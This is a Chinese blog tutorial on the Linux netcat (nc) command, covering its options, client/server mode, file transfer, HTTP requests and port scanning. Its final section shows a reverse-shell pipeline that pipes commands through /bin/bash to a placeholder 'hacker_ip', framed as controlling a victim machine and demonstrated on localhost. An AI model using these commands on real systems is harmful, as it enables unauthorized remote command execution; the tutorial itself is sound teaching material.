Linux命令-nc(端口监控、文件传输、反弹shell等)

简介: Linux命令-nc(端口监控、文件传输、反弹shell等)



简介

nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。进行TCP、UDP的连接和监听,可以将标准错误分离。

参数

This is nc from the netcat-openbsd package. An alternative nc is available

in the netcat-traditional package.

usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]

         [-P proxy_username] [-p source_port] [-q seconds] [-s source]

         [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]

         [-x proxy_address[:port]] [destination] [port]

       Command Summary:

               -4              Use IPv4

               -6              Use IPv6

               -b              Allow broadcast

               -C              Send CRLF as line-ending

               -D              Enable the debug socket option

               -d              Detach from stdin

               -h              This help text

               -I length       TCP receive buffer length

               -i secs         Delay interval for lines sent, ports scanned

               -j              Use jumbo frame

               -k              Keep inbound sockets open for multiple connects

               -l              Listen mode, for inbound connects

               -n              Suppress name/port resolutions

               -O length       TCP send buffer length

               -P proxyuser    Username for proxy authentication

               -p port         Specify local port for remote connects

               -q secs         quit after EOF on stdin and delay of secs

               -r              Randomize remote ports

               -S              Enable the TCP MD5 signature option

               -s addr         Local source address

               -T toskeyword   Set IP Type of Service

               -t              Answer TELNET negotiation

               -U              Use UNIX domain socket

               -u              UDP mode

               -V rtable       Specify alternate routing table

               -v              Verbose

               -w secs         Timeout for connects and final net reads

               -X proto        Proxy protocol: "4", "5" (SOCKS) or "connect"

               -x addr[:port]  Specify proxy address and port

               -Z              DCCP mode

               -z              Zero-I/O mode [used for scanning]

       Port numbers can be individual or ranges: lo-hi [inclusive]

nc的作用

简单的TCP代理

基于shell脚本的HTTP客户端或服务器

网络守护进程/程序测试

文件传输

反弹shell(非本意)

参数详解

nc参数

参数 解释
-4 强制nc仅使用IPv4地址
-6 强制nc仅使用IPv6地址
-b 允许广播
-C 发送CRLF作为行结束符
-D 在套接字上启动测试
-d 不要试图从标准输入读入数据
-h 打印nc帮助
-l length 指定TCP接收缓冲区大小
-i interval 指定发送和接收的文本行之间的延迟时间间隔。还会导致连接到多个端口之间的延迟时间。
-k 强制nc在当前连接完成后继续侦听另一个连接。在没有-l选项的情况下使用此选项是错误的。
-l 用于指定nc应侦听传入连接,而不是启动到远程主机的连接。将此选项与-p、-s或-z选项结合使用是错误的。此外,使用-w选项指定的任何超时都将被忽略。
-n 不要在任何指定的地址、主机名或端口上执行任何DNS或服务查找。
-O length 指定TCP发送缓冲区大小
-P proxy_username 指定要呈现给需要身份验证的代理服务器的用户名。如果未指定用户名,则不会尝试身份验证。目前仅支持HTTP CONNECT代理的代理身份验证。
-p  source_port 根据权限限制和可用性,指定nc应使用的源端口。支持nn-mm范围模式和空格分隔。
-q seconds 在stdin上执行EOF后,等待指定的秒数,然后退出。如果秒数为负,则永远等待。
-r 指定应随机选择源端口和/或目标端口,而不是在某个范围内或按照系统分配的顺序顺序进行选择。
-S 启用RFC 2385 TCP MD5签名选项。
-s source_ip 指定用于发送数据包的接口的IP。对于UNIX域数据报套接字,指定要创建和使用的本地临时套接字文件,以便可以接收数据报。将此选项与-l选项结合使用是错误的。
-U 指定使用UNIX域套接字。
-u 使用UDP而不是TCP的默认选项。对于UNIX域套接字,请使用数据报套接字而不是流套接字。如果使用UNIX域套接字,则在/tmp中创建临时接收套接字,除非给出-s标志。
-V rtable 设置要使用的路由表。默认值为0。
-v 让nc提供更详细的输出。
-w timeout 无法建立或在超时秒后处于空闲状态的连接。-w标志对-l选项没有影响,即nc将永久侦听连接,无论是否使用-w标志。默认值为无超时。
-X proxy_protocol 请求nc在与代理服务器对话时应使用指定的协议。支持的协议有“4”(SOCKS v.4)、“5”(SOCKS v.5)和“connect”(HTTPS代理)。如果未指定协议,则使用SOCKS版本5。
-x proxy_address[:port] 请求nc应使用代理地址和端口处的代理连接到目标。如果未指定端口,则使用代理协议的已知端口(1080用于SOCKS,3128用于HTTPS)。
-Z DCCP模式。
-z  指定nc应该只扫描侦听守护进程,而不向它们发送任何数据。将此选项与-l选项结合使用是错误的。

使用举例

客户/服务器模式

服务器端:监听端口

nc -l 6633

客户端:开启连接

nc 127.0.0.1 6633

客户端

服务器端

这是同一台服务器,使用了tmux,开了frankyu和yubo,两个session。客户端和服务端就建立了Tcp连接,进行通信。

注意:当我们关闭客户端时,服务端也会关闭,可以添加-k选项,使服务端不关闭。

文件传输

对上面的客户/服务器模式进行扩展即可。使用linux的重定向。

服务器端:

nc -l 6633 > filename.out

客户端:

nc 127.0.0.1 6633 < filename.in

博主测试了,不截图了,留给读者自己动手测试。

基于TCP的上层协议

可以通过nc发送基于TCP的上层协议数据包,例如,应用层的HTTP协议

printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80

端口扫描

利用-z和-v参数,输出是否连接成功

nc -zv ip/host ports

可以看到22端口打开了。也可使用 22 80 6633,这种空格分隔的形式。

使用-u,就可以进行udp的扫描。当然,更详细的端口扫描还是使用Nmap

反弹Shell

我们攻击其他的机器的时候,拿不到22端口的口令或私钥,甚至22端口没有打开。我们想要实时运行命令时,就可以使用nc反弹shell,有一种我们在操控对方电脑的感觉。利用前面的端口监听结合管道来实现。

在受害者机器上运行

nc -l port| /bin/bash/ | nc hacker_ip port

在攻击机上运行

nc -l port
nc victim_ip port

shell反弹示意图

博主手里就一台服务器,这里攻击机和受害机都是使用的一台。

攻击机监听6655端口

nc -l 6655

操纵受害机6633端口接收命令,执行后结果输出到攻击机的6655端口

nc -l 6633 |/bin/bash/| nc 127.0.0.1 6655

攻击机开启6633端口发送命令

nc 127.0.0.1 6633

从攻击机源端口发送命令,就可以从目的端口接收命令执行的结果。

更多内容查看:网络安全-自学笔记

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。如果您感觉有所收获,自愿打赏,可选择支付宝18833895206(小于),您的支持是我不断更新的动力。

相关文章
|
1天前
|
Linux 数据安全/隐私保护
Linux常用命令实例带注释
Linux常用命令实例带注释
5 0
|
1天前
|
Linux 开发工具 数据安全/隐私保护
Linux(19)常用解压命令记录
Linux(19)常用解压命令记录
6 0
|
2天前
|
机器学习/深度学习 缓存 监控
linux查看CPU、内存、网络、磁盘IO命令
`Linux`系统中,使用`top`命令查看CPU状态,要查看CPU详细信息,可利用`cat /proc/cpuinfo`相关命令。`free`命令用于查看内存使用情况。网络相关命令包括`ifconfig`(查看网卡状态)、`ifdown/ifup`(禁用/启用网卡)、`netstat`(列出网络连接,如`-tuln`组合)以及`nslookup`、`ping`、`telnet`、`traceroute`等。磁盘IO方面,`iostat`(如`-k -p ALL`)显示磁盘IO统计,`iotop`(如`-o -d 1`)则用于查看磁盘IO瓶颈。
|
2天前
|
Linux Perl
Linux系统替换字符串常用命令
请注意,`sed`命令可以非常强大,可以根据不同的需求使用不同的选项和正则表达式来进行更复杂的字符串替换操作。
16 0
|
5天前
|
安全 Linux 开发工具
Linux中可引起文件时间戳改变的相关命令
【4月更文挑战第12天】Linux中可引起文件时间戳改变的相关命令
12 0
|
5天前
|
运维 监控 Shell
利用Shell脚本编写局域网监控软件:实时监测主机连接情况
本文介绍了如何使用Shell脚本创建一个局域网监控工具,以实时检查主机连接状态。脚本包括扫描IP地址范围检测主机可达性及使用`netstat`监控ESTABLISHED连接。此外,还展示了如何每60秒将连接数数据自动提交到指定网站API,以便实时跟踪网络活动。这个自动化监控系统有助于提升网络安全性和故障排查效率。
24 0
|
6天前
|
域名解析 网络协议 Linux
Linux 中的 Nslookup 命令怎么使用?
【4月更文挑战第12天】
25 6
Linux 中的 Nslookup 命令怎么使用?
|
7天前
|
运维 网络协议 Unix
18.系统知识-Linux常用命令
18.系统知识-Linux常用命令
|
8天前
|
网络协议 Ubuntu Linux
Linux 下 TFTP 服务搭建及 U-Boot 中使用 tftp 命令实现文件下载
Linux 下 TFTP 服务搭建及 U-Boot 中使用 tftp 命令实现文件下载
|
8天前
|
Linux Go
Linux命令Top 100驱动人生! 面试必备
探索Linux命令不再迷茫!本文分10部分详解20个基础命令,带你由浅入深掌握文件、目录管理和文本处理。 [1]: <https://cloud.tencent.com/developer/article/2396114> [2]: <https://pan.quark.cn/s/865a0bbd5720> [3]: <https://yv4kfv1n3j.feishu.cn/docx/MRyxdaqz8ow5RjxyL1ucrvOYnnH>
60 0